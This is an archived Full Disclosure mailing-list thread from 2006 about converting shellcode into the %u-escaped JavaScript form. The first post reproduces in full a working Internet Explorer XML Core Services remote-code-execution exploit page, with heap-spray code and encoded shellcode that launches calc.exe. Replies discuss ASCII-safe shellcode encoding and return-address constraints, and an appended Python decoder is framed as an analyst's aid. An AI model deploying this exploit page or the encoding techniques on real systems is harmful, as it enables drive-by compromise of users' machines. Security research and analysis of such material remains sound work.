
Mailing List Archive: Full Disclosure: Full-Disclosure

How to convert shellcode to "HTML style" ?

 

 



lotos.lee at gmail

Nov 9, 2006, 1:44 AM

Post #1 of 4 (842 views)
How to convert shellcode to "HTML style" ?

For example, I find this exploit:
MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec Exploit <http://www.milw0rm.com/exploits/2743>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus 2.0//EN">
<!--
MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit

Author: n/a

Info:
http://blogs.securiteam.com/index.php/archives/721
http://isc.sans.org/diary.php?storyid=1823
http://xforce.iss.net/xforce/alerts/id/239

Found in the wild and was pointed out on securiteam's blog (cheers Gadi
Evron!)

Changed up the shellcode so it wouldn't be as evil for the viewers,
calc.exeis called.

/str0ke
-->

<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<object id=target classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}" >
</object>
<script>
var obj = null;
function exploit() {
obj = document.getElementById('target').object;

try {
obj.open(new Array(),new Array(),new Array(),new Array(),new Array());
} catch(e) {};

sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120"
+
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424"
+
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304"
+
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0"
+
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A"
+
"%uFF57%u63E7%u6C61%u0063");

sz = sh.length * 2;
npsz = 0x400000-(sz+0x38);
nps = unescape ("%u0D0D%u0D0D");
while (nps.length*2<npsz) nps+=nps;
ihbc = (0x12000000-0x400000)/0x400000;
mm = new Array();
for (i=0;i<ihbc;i++) mm[i] = nps+sh;

obj.open(new Object(),new Object(),new Object(),new Object(), new
Object());

obj.setRequestHeader(new Object(),'......');
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
}
</script>
<body onLoad='exploit()' value='Exploit'>

</body></html>
So, how to convert shellcode to this style:
sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120"
+
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424"
+
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304"
+
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0"
+
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A"
+
"%uFF57%u63E7%u6C61%u0063");


kokanin at gmail

Nov 9, 2006, 6:00 AM

Post #2 of 4 (788 views)
Re: How to convert shellcode to "HTML style" ? [In reply to]

On 11/9/06, 李继辉 <lotos.lee[at]gmail.com> wrote:
> For example, I find this exploit:

http://www.edup.tudelft.nl/~bjwever/src/beta.c, have fun with your
upcoming botnet.

--


debasis.mohanty.listmails at gmail

Nov 9, 2006, 12:20 PM

Post #3 of 4 (775 views)
Re: How to convert shellcode to "HTML style" ? [In reply to]

Lol!! I was just about to point out the same, Erik ...

Seen this a couple of times in the past, and a known technique :)


-----Original Message-----
From: full-disclosure-bounces[at]lists.grok.org.uk [mailto:full-disclosure-bounces[at]lists.grok.org.uk] On Behalf Of Knud Erik Højgaard
Sent: Thursday, November 09, 2006 6:01 AM
To: 李继辉
Cc: full-disclosure[at]lists.grok.org.uk
Subject: Re: [Full-disclosure] How to convert shellcode to "HTML style" ?

On 11/9/06, 李继辉 <lotos.lee[at]gmail.com> wrote:
> For example, I find this exploit:

http://www.edup.tudelft.nl/~bjwever/src/beta.c, have fun with your upcoming botnet.

--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


endrazine at gmail

Nov 11, 2006, 6:33 AM

Post #4 of 4 (760 views)
Re: How to convert shellcode to "HTML style" ? [In reply to]

<take 2: had some issues in sending this one>

Hi list,


Knud Erik Højgaard wrote:
> On 11/9/06, 李继辉 <lotos.lee[at]gmail.com> wrote:
>> For example, I find this exploit:
>
> http://www.edup.tudelft.nl/~bjwever/src/beta.c, have fun with your
> upcoming botnet.
Nod, encoding the shellcode into an acceptable charset is something that has been done for ages now (see Philippe Biondi's shellforge - did you fix the final ret ? ;) - for instance, or old phrack issues [2] [3]).

Let's focus a bit on x86:
What about the return address if you have a simple buffer overflow for instance ? I just had a few tests, and you can't simply urlencode the return address assuming the webserver/client will decode it automatically for you (it won't). Since addresses in the stack are typically around 0xbf?????? in memory, this return address _will_ contain non printable characters (at least the \bf one), even if the overflow is big enough so that you can get rid of the other ones by jumping at an appropriate address in the stack...

I have no simple solution atm, but forging valid arguments for the current syscall that will eventually do something evil in the process (which isn't something that can be done in a systematic way) and _not_ overwriting the return address.. You could think of crafting arguments for previous stack frames too, but since you still can't forge return addresses for those, you will not be able to overwrite both local and global variables pushed on the stack...

Another solution would be ret2esp [4], assuming you find:
1) a way to store your shellcode somewhere in memory, the address of your shellcode being a pure Ascii string.
2) an address in memory that will allow you to jmp %esp (or mov %esp, etc.), that address being usable as a return address (ie: is a pure Ascii string).

I doubt those conditions will ever be met..

Things should be quite similar on Sparc architectures imho since afaik, the return address isn't pushed on the stack, so the problem is very close to this one.

In a nutshell: Erik, I disagree with you, I think it's a valid, non trivial, question :)


Regards,

endrazine-

[1] http://www.secdev.org/projects/shellforge/ <--- which isn't just ia32 between :)

[2] http://www.phrack.org/archives/57/p57-0x18

[3] http://www.phrack.org/archives/61/p61-0x0b_Building_IA32_UnicodeProof_Shellcodes.txt


[4] http://www.tty64.org/doc/expwlnxgateso1.txt
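An added example, not code from the thread or from any tool it links: a small Python decoder for the %u-escaped form the first post asks about, modelling what JavaScript's unescape() returns and how those 16-bit code units sit in memory as UTF-16LE, plus the printable-ASCII check that endrazine's point about 0xbf... return addresses turns on. SAMPLE is constructed and only reproduces the opening of that style (a NOP sled, then the cld/call prologue); all function names are this example's own.

```python
import re
from typing import List

# Constructed sample in the style the first post asks about: a short NOP sled
# followed by "cld; call" (the opening bytes of the quoted string), nothing more.
SAMPLE = "%u9090%u9090%u9090%u9090%uE8FC%u0044%u0000"

# One token of JavaScript unescape() input: %uXXXX, %XX, or a literal character.
_TOKEN = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})|(.)", re.DOTALL)

def unescape_code_units(s: str) -> List[int]:
    """Model unescape(): the 16-bit code units of the JS string it returns.
    %uXXXX -> one unit, %XX -> unit 0x00XX, other characters -> their own
    code point (astral ones as a surrogate pair). Malformed escapes stay literal."""
    units: List[int] = []
    for m in _TOKEN.finditer(s):
        hex4, hex2, ch = m.groups()
        if hex4 is not None:
            units.append(int(hex4, 16))
        elif hex2 is not None:
            units.append(int(hex2, 16))
        elif ord(ch) > 0xFFFF:
            cp = ord(ch) - 0x10000
            units += [0xD800 + (cp >> 10), 0xDC00 + (cp & 0x3FF)]
        else:
            units.append(ord(ch))
    return units

def units_to_bytes(units: List[int]) -> bytes:
    """Lay the units out as a UTF-16LE JS string sits in memory, low byte
    first: %uE8FC therefore becomes the bytes FC E8 (cld; call ...)."""
    return b"".join(bytes((u & 0xFF, u >> 8)) for u in units)

def decode_u_escapes(s: str) -> bytes:
    """Bytes that a page like the quoted one places in memory for the string s."""
    return units_to_bytes(unescape_code_units(s))

def nop_sled_length(data: bytes, nop: int = 0x90) -> int:
    """Length of the leading run of NOPs, the sled that precedes the payload."""
    n = 0
    while n < len(data) and data[n] == nop:
        n += 1
    return n

def non_printable_offsets(data: bytes) -> List[int]:
    """Offsets of bytes outside printable ASCII, i.e. what a pure-ASCII carrier
    cannot hold without decoding help: endrazine's point about 0xbf... addresses."""
    return [i for i, b in enumerate(data) if not 0x20 <= b <= 0x7E]
```

Running decode_u_escapes over the sh string of a captured page gives an analyst the raw bytes to disassemble, and non_printable_offsets on a little-endian packed stack address shows why such an address cannot travel as plain ASCII.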



